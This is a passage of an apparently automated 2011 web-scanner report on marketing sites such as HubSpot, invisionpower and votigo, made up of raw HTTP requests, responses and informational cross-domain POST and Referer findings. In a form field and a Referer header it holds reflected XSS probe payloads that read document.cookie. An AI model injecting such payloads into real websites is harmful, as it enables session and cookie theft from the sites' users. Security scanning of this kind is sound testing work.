GhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12
Cookie: VISITOR_INFO1_LIVE=PXLgQPU3X3w; PREF=fv=0.0.0

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:00:23 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1199
Content-Type: application/x-shockwave-flash

CWS.....x.}VYw.F...a.5 Y....m...4 ..9........^....4..BR..............)..3.I..0..s...`.5@....1(.....o ..u...Y.mJ.......S.cd.N'.3s...m.y./....o:ii].f.\...3..-I.At..........!.r~..yu.}.r^^F.$.a..zTG.>@.$..t.6.x..&/!.1..3TO..m.,g.V........+(^..&...n.Qw.:.x..m......CTz.`...m.'M..}..........@.......?h....IA..P.0.\....ZV..q.k>.......9.N..>_)hMeI.^}..]M7Tb.._v...).j.S...R7...F\ .c.d.4K.N..D.#%@.%.o.`A.d....y..[.!..gjV..UK...W5.x&%u..........I..pX.\\j.e.........R9..~....+...wN...B{.|.s........|(Wa.......qPb.P.fpUTU....A.l..w.
\.$.(V..c. ....44.\......:.i..hz.2]h..#.%..K.....Knw{.K<.t...l`Pl+.a.3_sM.b...6..J<.C..M..oKk..1....h........A'>..>tm.....t....p-.O<.A..WFI..9.]..a.........I`.:.8h.o&DK+..[|.)...@e.......P...=...4.....dR....;..X...$6..Y\.....D.A..H..!.........Oy%..!.IVO.......j?c.'.G)..].i......s.G7...0..W.:Q.c.f..Lr...L.u...W.ba....;.A..qdU...1....N"Pq..n....N.(p.b.g...@.j...1.E.~.U.M...j.O8..8...0...0........=.n..<b5.... .......U."?..&....pB...x.' b|]I.43.5...Y.q.1.q.8.ca3...ca..../H./A~Z..............L..rm....o....G{1..P..
8..J.Z.s+..Fp.%.&J.m...d..owP&N.U...'...NX..;..qn*
..
~'<. ..&[.L..[........B....*U.m.....E...m:..d.K.8.x-+lT......OI.2. |.H..W}..a:ziJ.w.f.7...E5..

Request 2

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:00:41 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1092
Content-Type: application/x-shockwave-flash

CWS.....x.}U[s.D..,..rm.^L..&@a`..4....NI......^4........N...S.=.......-sv.....a........0.....I.....m...0...~..]......Q.r..)X~.8p.....}..q...b.W....../..VFK..H.k1.f6i.@....^.T*.|.W....r.\.$.<......I.u`..S.........6H}.0..#4..u......Nikww.......p..G.V3..Z=.....N.,. ..&.2...F.,..#.\.#.UJ....!a..t[@t...A4..!/...xE+..............2..._........iE[..G.O_.h.......#..._!W.Z........&Z..E;.>'.c3.p........a..e<...E....%Z..Q7.Wf.E..3.7../i.2._........~.t..>..0`.....7.......2.......}j..\.../.a.v.....D..r.....:E.5....g.G..'..G..i1..t\..3..{.....l...... 8..5.....E..C.J.6..>-
f.....1.r..c.V.&.x6;;iC.Ihy5Q....-.!......q1..o6.....sMbo.@G>..C..i!..Ru..{.^..7..d.B...HH.b!}Nw(...i..j..SW5.'}....l3..i.4.Q..R
%'..Q?_.i........lM.s.'..2d...,H..\.j.|. V.q"S\..2....MD.m1...).Pu..j.. ..AU.K%..G..? ........d.c..mPcS#./M....I2j....R..L.8.....S>..g..h.z...B/...dU.....$g$..}.....C.....e...{.H%....3...q-%...-.".j...{... .i\pwHn.r,.h7'.h.=+...~..f..:;=.q.....].....I.....'j
WL.GI+/G.....}|H6u^..'r?'...1-.LB..2TUtU.~%>....!..M....h.z........q._..w...i.............tE.M7r..W._.z4..g=.Gs....~..!]....?.eZ
..a..,..S

15. Cross-domain POST previous next
There are 10 instances of this issue:

http://frimastudio.com/
http://www.insidefacebook.com/
http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif
http://www.insidemobileapps.com/advertise-with-us/
http://www.invisionpower.com/hosting/advanced.php
http://www.invisionpower.com/products/board/
http://www.invisionpower.com/suite/demo.php
https://www.invisionpower.com/clients/index.php
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

15.1. http://frimastudio.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://frimastudio.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

oid
retURL
lead_source
first_name
last_name
title
company
phone
email
country
description

Request

Response

15.2. http://www.insidefacebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidefacebook.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_forward_vars
meta_tooltip
name
email
submit

Request

GET / HTTP/1.1
Host: www.insidefacebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.3. http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
name
email
submit

Request

GET /2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/ HTTP/1.1
Host: www.insidemobileapps.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.4. http://www.insidemobileapps.com/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
name
email
submit

Request

GET /2011/05/09/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1
Host: www.insidemobileapps.com
Proxy-Connection: keep-alive
Referer: http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:53:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 15 May 2011 16:53:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 30732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</style>
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

15.5. http://www.insidemobileapps.com/advertise-with-us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.insidemobileapps.com
Path:	/advertise-with-us/

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
listname
redirect
meta_adtracking
meta_message
meta_required
meta_tooltip
name
email
submit

Request

GET /advertise-with-us/ HTTP/1.1
Host: www.insidemobileapps.com
Proxy-Connection: keep-alive
Referer: http://www.insidemobileapps.com/2011/05/09/monday-mobile-roundup-rovio-ipo-capcom-mobile-revenue-paperphone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=243597533.1305478392.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243597533.1997988298.1305478392.1305478392.1305478392.1; __utmc=243597533; __utmb=243597533.1.10.1305478392

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.insidemobileapps.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 32961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</style>
<form method="post" class="af-form-wrapper" action="http://www.aweber.com/scripts/addlead.pl" >
<div style="display: none;">
...[SNIP]...

15.6. http://www.invisionpower.com/hosting/advanced.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/hosting/advanced.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

redirect
errorredirect
listid
specialid:156944
clientid
formid
reallistid
doubleopt
fields_email
Submit

Request

Response

15.7. http://www.invisionpower.com/products/board/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/products/board/

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

redirect
errorredirect
listid
specialid:156944
clientid
formid
reallistid
doubleopt
fields_email
Submit

Request

Response

15.8. http://www.invisionpower.com/suite/demo.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.invisionpower.com
Path:	/suite/demo.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

redirect
errorredirect
listid
specialid:156944
clientid
formid
reallistid
doubleopt
fields_email
Submit

Request

Response

15.9. https://www.invisionpower.com/clients/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.invisionpower.com
Path:	/clients/index.php

Issue detail

The page contains a form which POSTs data to the domain app.icontact.com. The form contains the following fields:

redirect
errorredirect
listid
specialid:156944
clientid
formid
reallistid
doubleopt
fields_email
Submit

Request

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:28:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: maan_session_id=a4533e26a4bb6bff0bf247e222ebe94c; path=/; domain=invisionpower.com; httponly
Set-Cookie: PHPSESSID=d0f3d69516c661d8737579de7244be22; path=/
Expires: Sat, 14 May 2011 16:28:42 GMT
Cache-Control: no-cache,must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 26115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <head>
<script type=
...[SNIP]...
</span>
                   <form method='post' action="https://app.icontact.com/icp/signup.php" name="icpsignup" accept-charset="UTF-8">
                       <fieldset>
...[SNIP]...

15.10. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The page contains a form which POSTs data to the domain salesforce.ringlead.com. The form contains the following fields:

utf8
oid
RL_task_email_notification
task_subject
sfga
00N70000002R5YK
lead_source
00N70000002EaG6
Campaign_ID
member_status
00N70000002hg6N
00N70000002P0f5
00N70000002Py7F
retURL
first_name
last_name
email
company
phone
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
country
title
title
title
title
title
title
title
title
title
title
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002IDl2
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R0DW
00N70000002R7OJ
00N70000002R7OJ
00N70000002R7OJ
00N70000002R7OJ
00N70000002R7OJ
00N70000002R7OJ
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002Py7F
00N70000002R0Dt
00N70000002R0Dt
00N70000002R0Dt
00N70000002R0Dt
00N70000002R0Dt
00N70000002R0Dt
commit
current_stage

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16. Cross-domain Referer leakage previous next
There are 10 instances of this issue:

http://cdn.shoutlet.com/static/flash/swfjs/
http://cdn.shoutlet.com/widgets/
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.google.com/search
http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
http://www.hubspot.com/free-trial/Default.aspx
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
http://www.shoutlet.com/features/landingpage.php
http://www.votigo.com/corp/solutions/fbcontests.php

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

16.1. http://cdn.shoutlet.com/static/flash/swfjs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/static/flash/swfjs/

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.shoutlet.com/static/flash/swfjs/?w=23690

The response contains the following link to another domain:

http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /static/flash/swfjs/?w=23690 HTTP/1.1
Host: cdn.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/features/landingpage.php?utm_source=insidefacebook&utm_medium=display&utm_content=powerfb&utm_campaign=q211
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.5
Cache-Control: max-age=300
Content-Type: text/html
Age: 1
Date: Sun, 15 May 2011 16:53:14 GMT
Expires: Sun, 15 May 2011 16:58:13 GMT
Content-Length: 1172
Connection: keep-alive

document.write( '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="286" height="108" id="shoutletWidget" align="middle"><param name="movie" value="http://cdn.shoutlet.com/widgets/flash/SWFBootstrap.php?w=23690" />
...[SNIP]...

16.2. http://cdn.shoutlet.com/widgets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.shoutlet.com
Path:	/widgets/

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.shoutlet.com/widgets/?w=28298

The response contains the following link to another domain:

http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /widgets/?w=28298 HTTP/1.1
Host: cdn.shoutlet.com
Proxy-Connection: keep-alive
Referer: http://www.shoutlet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=211259095.1305478395.1.1.utmcsr=insidefacebook|utmccn=q211|utmcmd=display|utmcct=powerfb; __utma=211259095.908435419.1305478395.1305478395.1305478395.1; __utmc=211259095; __utmb=211259095.1.10.1305478395

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Content-Type: text/html
Content-Length: 1171
Connection: keep-alive

document.write( '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="325" height="313" id="shoutletWidget" align="middle"><param name="movie" value="http://cdn.shoutlet.com/widgets/flash/SWFBootstrap.php?w=28298" />
...[SNIP]...

16.3. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/HD3OAbjOVTn.css

Request

Response

16.4. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/Bj5jbUlrgiA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/fyAhkjMytaS.css

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook&b3bee%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E50da1df71b5=1
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response

16.5. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ip+board+software

The response contains the following links to other domains:

http://community.invisionpower.com/
http://community.invisionpower.com/resources/
http://community.invisionpower.com/resources/official.html
http://en.wikipedia.org/wiki/Invision_Power_Board
http://ipboard-software.software.informer.com/
http://thinkofit.com/webconf/forumsoft.htm
http://webcache.googleusercontent.com/search?q=cache:6zPAbdiM6HsJ:www.julong.com.cn/en/News/188.html+ip+board+software&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:76X_ncmJly8J:www.invisionpower.com/products/gallery/+ip+board+software&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:7ETs2caA0eMJ:www.invisionpower.com/+ip+board+software&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:L3-QgO6ibUgJ:en.wikipedia.org/wiki/Invision_Power_Board+ip+board+software&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PmlRsuZTAsUJ:www.invisionpower.com/products/blog/+ip+board+software&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:V7ycC9DTf5gJ:www.123flashchat.com/ipb_chat.html+ip+board+software&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ip+board+software&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:qnHi427Jq2oJ:www.forum-software.org/tag/ipboard+ip+board+software&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:rwIJ10wJfloJ:ipboard-software.software.informer.com/+ip+board+software&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
